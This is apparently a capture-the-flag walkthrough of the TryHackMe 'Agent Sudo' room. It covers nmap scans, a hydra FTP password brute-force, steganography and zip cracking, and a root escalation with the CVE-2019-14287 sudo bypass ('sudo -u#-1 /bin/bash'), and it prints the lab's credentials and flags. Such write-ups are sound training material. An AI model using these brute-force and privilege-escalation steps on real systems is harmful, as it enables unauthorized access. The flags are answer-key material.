Agent Sudo

tryhackme.com - © TryHackMe

🔗 Agent Sudo

Task 1 - Deploy the machine

🎯 Target IP: 10.10.62.30

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.62.30 agent_sudo.thm" >> /etc/hosts

mkdir thm/agent_sudo.thm  
cd thm/agent_sudo.thm

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 agent_sudo.thm
PING agent_sudo.thm (10.10.62.30) 56(84) bytes of data.
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=1 ttl=63 time=132 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=2 ttl=63 time=81.8 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=3 ttl=63 time=123 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.

Task 3 - Enumerate

3.1 - How many open ports?

nmap --open -n -Pn -vvv -T4 agent_sudo.thm 

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 14:49 EDT
Warning: Hostname agent_sudo.thm resolves to 2 IPs. Using 10.10.62.30.
Initiating SYN Stealth Scan at 14:49
Scanning agent_sudo.thm (10.10.80.70) [1000 ports]
Discovered open port 80/tcp on 10.10.62.30
Discovered open port 22/tcp on 10.10.62.30
Discovered open port 21/tcp on 10.10.62.30
Completed SYN Stealth Scan at 14:49, 1.15s elapsed (1000 total ports)
Nmap scan report for agent_sudo.thm (10.10.62.30)
Host is up, received user-set (0.078s latency).
Other addresses for agent_sudo.thm (not scanned): 10.10.62.30
Scanned at 2023-07-02 14:49:50 EDT for 1s
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

command	result
sudo	run as root
sC	run default scripts
sV	enumerate versions
A	aggressive mode
T4	run a bit faster
oN	output to file with nmap formatting

nmap -p21,22,80 -sCV -vvv -T4 agent_sudo.thm

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
|   256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

It looks like there are three open ports on the machine: 21, 22, 80.

3.2 - How you redirect yourself to a secret page?

user-agent

3.3 - What is the agent name?

We can see our user-agent using dev mode (F12)

We say that the correct user-agent is a capital letter, than using BurpSuite we can test all alphabet

1MB

user-agent_burp_suite.webm

Open

We need to set user-agent to 'C' and we can see agent name.

For this thing, we can use a firefox extension: User-Agent Switcher and Manager

setting user-agent to 'C'

Refreshing page we see agent name:

http://10.10.89.63/agent_C_attention.php

chris

Task 4 - Hash cracking and brute-force

4.1 - FTP password

We knwo a username: chris, then, we can use hydra to find psw:

hydra -l chris -P /usr/share/wordlists/rockyou.txt agent_sudo.thm ftp

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-02 18:24:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://agent_sudo.thm:21/
[STATUS] 244.00 tries/min, 244 tries in 00:01h, 14344155 to do in 979:48h, 16 active
[21][ftp] host: agent_sudo.thm   login: chris   password: crystal
1 of 1 target successfully completed, 1 valid password found

crystal

chris::crystal

4.2 - Zip file password

It's time to access with ftp credentials:

ftp agent_sudo.thm
Connected to agent_sudo.thm.
220 (vsFTPd 3.0.3)
Name (agent_sudo.thm:kali): chris
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10070|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.

ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
229 Entering Extended Passive Mode (|||54801|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************************|   217       43.31 KiB/s    00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (3.08 KiB/s)

cat To_agentJ.txt 

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From, Agent C

It surely means that we're talking about steganography, then, we download all photos with get command.

exiftool cute-alien.jpg

ExifTool Version Number         : 12.63
File Name                       : cute-alien.jpg
Directory                       : .
File Size                       : 33 kB
File Modification Date/Time     : 2019:10:29 08:22:37-04:00
File Access Date/Time           : 2023:07:02 18:55:15-04:00
File Inode Change Date/Time     : 2023:07:02 18:55:15-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 440
Image Height                    : 501
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 440x501
Megapixels                      : 0.220

exiftool cutie.png

ExifTool Version Number         : 12.63
File Name                       : cutie.png
Directory                       : .
File Size                       : 35 kB
File Modification Date/Time     : 2019:10:29 08:33:51-04:00
File Access Date/Time           : 2023:07:02 18:55:22-04:00
File Inode Change Date/Time     : 2023:07:02 18:55:22-04:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 528
Image Height                    : 528
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Palette                         : (Binary data 762 bytes, use -b option to extract)
Transparency                    : (Binary data 42 bytes, use -b option to extract)
Warning                         : [minor] Trailer data after PNG IEND chunk
Image Size                      : 528x528
Megapixels                      : 0.279

These two informations are important:

Compression                     : Deflate/Inflate
Palette                         : (Binary data 762 bytes, use -b option to extract)

Then, we use flag -b to extract archive:

exiftool -b cutie.png

Warning: [minor] Trailer data after PNG IEND chunk - cutie.png
12.63cutie.png.348422019:10:29 08:33:51-04:002023:07:02 18:55:22-04:002023:07:02 18:55:22-04:00100644PNGPNGimage/png52852883000�����������������������������������������������������������������������������������������������������������������������������a���*EB��:����ϲ30p�.(CA��b+FB��8">;&@B&A>9RO =:#<A;8$@=96.)%>A��b��:&AA��:��e��c��]��9��_�`P��b4-HC��Z5NK�#▒��W���!:@t�-�ӵ0KG�����������Ͱ���r�-u�"6SB��?/KB�����6��G��������L��C2OB��ب�Z���CZWn�,Rhc��T9X@>VRMc^�ٻ����ꖞ�P��`H_[z�;��W��9l�,���Wli������j}z��])&��c���^rmGk>t�<Nq;��d��;���cwt������>\G��Z�����Ց����:������Q|?Be>>^>��\!EC��������Ј��u����\Y|M��������QsK}��o�~��X�����vEeHm�<��ƌ��a�=l�*x����mg�=$ ������`�2m�R�è]�>���a�OW�>h�0��/����ôf�PWw5���t�S��������°����PLlJ����������󜥰�i{n�:�"�˼}�|z�)[oa�������줃����I��Vx�T�����Aq�q��������W3D?y�5���}�U�aPAA=�>0�'��x�UF�.%sPHz6/|�nVE?e82��ȅ�ZM�UJ��N��D��
�(���0Θ�?E�LU8��]��eԹsxoj������[minor] Trailer data after PNG IEND chunk528 5280.278784                 

it's not a good solution, we can try another similar tool (binwalk):

binwalk -e cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression

WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [Errno 2] No such file or directory: 'jar', 'jar xvf '%e'' might not be installed correctly
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txtls

34820         0x8804          End of Zip archive, footer length: 22

ls -l         
total 316
-rw-r--r-- 1 kali kali 279312 Jul  2 19:11 365
-rw-r--r-- 1 kali kali  33973 Jul  2 19:11 365.zlib
-rw-r--r-- 1 kali kali    280 Jul  2 19:11 8702.zip
-rw-r--r-- 1 kali kali      0 Oct 29  2019 To_agentR.txt

So we used “zip2john” to crack the zip file password:

zip2john 8702.zip > Output.txt

And then we used John the Ripper to crack the hash:

john Output.txt

Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien            (8702.zip/To_agentR.txt)     
1g 0:00:00:00 DONE 2/3 (2023-07-03 14:07) 1.063g/s 46195p/s 46195c/s 46195C/s 123456..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We've found the archive password:

alien

4.3 - Steg password

So we tried to extract the zip file but unzip command didn’t work so we used this command

7z e 8702.zip

ls
365  365.zlib  8702.zip  Output.txt  To_agentR_1.txt  To_agentR.txt
cat To_agentR.txt

Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By, Agent R

This word: QXJlYTUx can be an encoded psw,

we can use a web tool: https://gchq.github.io/CyberChef/#input=UVhKbFlUVXg or

echo 'QXJlYTUx' | base64 -d 

Area51

4.4 - Who is the other agent (in full name)?

Reading last request (steg psw), we image that's the cute-alien.jpg steg password, then we use steghide to extract information:

steghide --extract -sf cute-alien.jpg

Enter passphrase: 
wrote extracted data to "message.txt".

cat message.txt

Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy, chris

James

4.5 - SSH password

Reading message.txt, we know that the psw is:

hackerrules!

ssh james@agent_sudo.thm
james@agent_sudo.thm's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

Task 5 - Capture the user flag

5.1 - What is the user flag?

ls
Alien_autospy.jpg  user_flag.txt
cat user_flag.txt 

🚩 Flag 1 (flag.txt)

b03d975e8c92a7c04146cfa7a5a313c7

5.2 - What is the incident of the photo called?

We need to find out where the image is from. You can use the command below to download the image from the machine and do a reverse image search on Google

scp james@10.10.62.30:Alien_autospy.jpg /home/

We can do a reverse image search on this jpg using Google:

Roswell alien autopsy

Task 6 - Privilege escalation

6.1 - CVE number for the escalation

We can check the user's permissions by the following command:

sudo -l

Googling the result we find the following vulnerability:

In alternative we can retrieve sudo version and find it on searchsploit.

CVE-2019-14287

6.2 - What is the root flag?

We use this exploit to scale privileges:

sudo -u#-1 /bin/bash

We're root!

whoami
root
cd /root
ls
root.txt
cat root.txt

🚩 Flag 2 (root.txt)

b53a02f55b57d4439e3341834d70c062

6.3 - (Bonus) Who is Agent R?

Reading all message of root's flag, we can say the name of agent R:

To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

By, DesKel a.k.a Agent R

DesKel